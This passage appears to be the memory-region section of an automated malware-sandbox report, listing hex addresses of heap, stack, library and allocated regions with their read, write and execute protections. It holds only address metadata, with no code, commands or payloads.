heap
page read and write
35C0000
heap
page read and write
55B2000
heap
page read and write
7110000
trusted library allocation
page read and write
4C5E000
heap
page read and write
317C000
heap
page read and write
71AE000
stack
page read and write
7090000
trusted library allocation
page read and write
5231000
heap
page read and write
3680000
heap
page read and write
2C94000
heap
page read and write
4C98000
heap
page read and write
37FF000
heap
page read and write
4C57000
heap
page read and write
4C58000
heap
page read and write
E74000
heap
page read and write
7B40000
trusted library allocation
page execute and read and write
52D0000
heap
page read and write
31CF000
heap
page read and write
6AD3000
heap
page read and write
6DC0000
heap
page execute and read and write
3183000
heap
page read and write
2C94000
heap
page read and write
3171000
heap
page read and write
5F90000
remote allocation
page read and write
6BCF000
stack
page read and write
6BDE000
stack
page read and write
36BF000
heap
page read and write
5231000
heap
page read and write
4C50000
heap
page read and write
69CE000
stack
page read and write
5231000
heap
page read and write
8DC000
stack
page read and write
61E3000
heap
page read and write
3B90000
unclassified section
page execute and read and write
640000
heap
page read and write
658B000
stack
page read and write
4C74000
heap
page read and write
57B5000
trusted library allocation
page read and write
4918000
trusted library allocation
page read and write
4C4C000
heap
page read and write
715000
heap
page read and write
8A0000
trusted library allocation
page read and write
3680000
heap
page read and write
4C4F000
heap
page read and write
734F000
stack
page read and write
4C49000
heap
page read and write
4940000
trusted library allocation
page read and write
4D50000
heap
page read and write
3171000
heap
page read and write
4C57000
heap
page read and write
71EE000
stack
page read and write
4C61000
heap
page read and write
53E1000
heap
page read and write
8D0000
heap
page read and write
4C61000
heap
page read and write
2E8C000
stack
page read and write
2FC0000
heap
page read and write
4C61000
heap
page read and write
61A6000
heap
page read and write
2C94000
heap
page read and write
5231000
heap
page read and write
31E6000
heap
page read and write
4C61000
heap
page read and write
4C55000
heap
page read and write
91E000
stack
page read and write
5FB6000
heap
page read and write
368E000
heap
page read and write
3176000
heap
page read and write
4C50000
heap
page read and write
3632000
heap
page read and write
4C61000
heap
page read and write
6A0000
heap
page read and write
4A4E000
trusted library allocation
page read and write
3130000
heap
page read and write
4C5E000
heap
page read and write
3680000
heap
page read and write
5591000
heap
page read and write
369C000
heap
page read and write
55E0000
heap
page read and write
4C86000
heap
page read and write
110F000
stack
page read and write
4CA8000
heap
page read and write
6735000
heap
page execute and read and write
2C94000
heap
page read and write
4C80000
heap
page read and write
4C49000
heap
page read and write
4C61000
heap
page read and write
366E000
heap
page read and write
4C5A000
heap
page read and write
4C4C000
heap
page read and write
4C61000
heap
page read and write
31E6000
heap
page read and write
2C94000
heap
page read and write
601F000
heap
page read and write
F10000
heap
page read and write
29AF000
stack
page read and write
7130000
trusted library allocation
page read and write
4C7D000
heap
page read and write
882000
trusted library allocation
page read and write
326E000
heap
page read and write
70D0000
trusted library allocation
page read and write
A2B000
stack
page read and write
670000
heap
page read and write
32F7000
stack
page read and write
364F000
heap
page read and write
3696000
heap
page read and write
31F8000
heap
page read and write
6D70000
heap
page read and write
5231000
heap
page read and write
369B000
heap
page read and write
680D000
stack
page read and write
4C56000
heap
page read and write
6E7C000
stack
page read and write
F20000
heap
page read and write
3176000
heap
page read and write
4C74000
heap
page read and write
860000
trusted library allocation
page read and write
3410000
heap
page read and write
6E01000
heap
page read and write
5231000
heap
page read and write
3190000
heap
page read and write
EE7000
heap
page read and write
604C000
heap
page read and write
3180000
heap
page read and write
4940000
heap
page read and write
4B0000
heap
page read and write
33B4000
heap
page read and write
5580000
trusted library allocation
page read and write
6021000
heap
page read and write
4C41000
heap
page read and write
4C86000
heap
page read and write
499A000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
31EF000
heap
page read and write
4C4C000
heap
page read and write
4C41000
heap
page read and write
35C3000
heap
page read and write
4C49000
heap
page read and write
4C6C000
heap
page read and write
4C4C000
heap
page read and write
2C94000
heap
page read and write
6AC4000
heap
page read and write
561F000
heap
page read and write
6005000
heap
page read and write
7B50000
trusted library allocation
page read and write
37EE000
stack
page read and write
6CC0000
heap
page read and write
2DAE000
stack
page read and write
4C5E000
heap
page read and write
3186000
heap
page read and write
4C65000
heap
page read and write
5FD9000
heap
page read and write
853000
trusted library allocation
page execute and read and write
4C61000
heap
page read and write
5237000
heap
page read and write
6842000
heap
page read and write
2C95000
heap
page read and write
5231000
heap
page read and write
869000
trusted library allocation
page read and write
3622000
heap
page read and write
56E0000
trusted library allocation
page read and write
3153000
heap
page read and write
7080000
trusted library allocation
page execute and read and write
368A000
heap
page read and write
2C94000
heap
page read and write
4CA7000
heap
page read and write
10016000
direct allocation
page execute and read and write
4C41000
heap
page read and write
9218000
heap
page read and write
3178000
heap
page read and write
4C5E000
heap
page read and write
602E000
heap
page read and write
4AC0000
heap
page read and write
5580000
trusted library allocation
page read and write
4C5E000
heap
page read and write
31CB000
heap
page read and write
5230000
heap
page read and write
7070000
trusted library allocation
page read and write
53E0000
heap
page read and write
6841000
heap
page read and write
3684000
heap
page read and write
5E1F000
stack
page read and write
4C41000
heap
page read and write
4C52000
heap
page read and write
2C94000
heap
page read and write
352E000
stack
page read and write
4C80000
heap
page read and write
5580000
trusted library allocation
page read and write
36EA000
heap
page read and write
478000
stack
page read and write
7EC1000
trusted library allocation
page read and write
4C51000
heap
page read and write
3120000
heap
page read and write
3631000
heap
page read and write
4C41000
heap
page read and write
7EE000
stack
page read and write
2BC0000
heap
page read and write
2E00000
heap
page read and write
53BD000
stack
page read and write
31CB000
heap
page read and write
4C86000
heap
page read and write
4C65000
heap
page read and write
3202000
heap
page read and write
368D000
heap
page read and write
354E000
stack
page read and write
7E3E000
stack
page read and write
2F28000
heap
page read and write
10000000
direct allocation
page read and write
33B0000
heap
page read and write
5231000
heap
page read and write
5590000
trusted library allocation
page read and write
33B4000
heap
page read and write
312A000
heap
page read and write
751000
heap
page read and write
55D7000
heap
page read and write
456000
system
page execute and read and write
4C6E000
heap
page read and write
383E000
unclassified section
page execute and read and write
365F000
heap
page read and write
3203000
heap
page read and write
37F0000
heap
page read and write
70F0000
trusted library allocation
page read and write
4C41000
heap
page read and write
4C86000
heap
page read and write
3637000
heap
page read and write
31CF000
heap
page read and write
3196000
heap
page read and write
2F7E000
stack
page read and write
30F0000
heap
page read and write
3240000
heap
page read and write
3680000
heap
page read and write
3184000
heap
page read and write
4C61000
heap
page read and write
8ED2000
trusted library allocation
page read and write
5591000
heap
page read and write
90B6000
trusted library allocation
page read and write
7EBE000
stack
page read and write
3132000
heap
page read and write
5580000
trusted library allocation
page read and write
4C5E000
heap
page read and write
6EF0000
trusted library allocation
page read and write
31F5000
heap
page read and write
3202000
heap
page read and write
4C4E000
heap
page read and write
3185000
heap
page read and write
61E3000
heap
page read and write
4C80000
heap
page read and write
67A000
heap
page read and write
4C53000
heap
page read and write
336E000
stack
page read and write
33B4000
heap
page read and write
5DBE000
stack
page read and write
2C94000
heap
page read and write
3178000
heap
page read and write
492F000
trusted library allocation
page read and write
3637000
heap
page read and write
2DF0000
heap
page read and write
3183000
heap
page read and write
330E000
stack
page read and write
4920000
trusted library allocation
page read and write
61FC000
heap
page read and write
3184000
heap
page read and write
534E000
stack
page read and write
3130000
heap
page read and write
519F000
stack
page read and write
33B4000
heap
page read and write
556F000
stack
page read and write
940000
heap
page read and write
BBC000
stack
page read and write
2F20000
heap
page read and write
A60000
heap
page read and write
4C5E000
heap
page read and write
2C95000
heap
page read and write
6DDA000
trusted library allocation
page read and write
66FD000
stack
page read and write
7120000
heap
page read and write
362F000
stack
page read and write
4C5E000
heap
page read and write
668D000
stack
page read and write
68CF000
stack
page read and write
49A2000
trusted library allocation
page read and write
369F000
heap
page read and write
663E000
stack
page read and write
4C41000
heap
page read and write
7BC000
stack
page read and write
2C95000
heap
page read and write
There are 877 hidden memdumps, click here to show them.